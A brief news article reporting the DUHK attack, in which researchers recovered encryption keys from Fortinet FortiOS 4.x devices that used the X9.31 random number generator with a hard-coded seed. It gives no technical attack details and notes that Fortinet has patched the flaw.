DUHK attack recovers secret keys from Fortinet devices

Cryptographers have devised an attack that allows the recovery of secret digital keys from network devices and therefore full, silent interception of traffic.

Researchers Nadia Heninger, Shaanan Cohen and Matthew Green from the John Hopkins University found that devices using the American National Standards Institute X9.31-based pseudo-random number generator (PRNG) can be reliably attacked to guess the keys used to encrypt communications.

Although deprecated since 2016, X9.31 is still used in government-certified hardware.

The attack - dubbed Don't Use Hard-coded Keys, or "DUHK" - works against devices in which the X9.31 seed key is included in the implementation of the PRNG.

If the output from the PRNG is also used to directly generate the cryptographic keys, the device in question is vulnerable to the DUHK attack.

The attack is passive and would not be noticed by victims.

The researchers targeted Fortinet devices running the FortiOS 4.x operating system to test their attack. They found around 25,000 Fortinet devices are vulnerable to the DUHK attack.

While recovering the keys is time-consuming - around four minutes per connection - the researchers said the attack was practical to carry out.

They suggested developers stop using the X9.31 PRNG.

Fortinet has patched its device firmware in later versions of FortiOS to remove the weak X9.31 PRNG.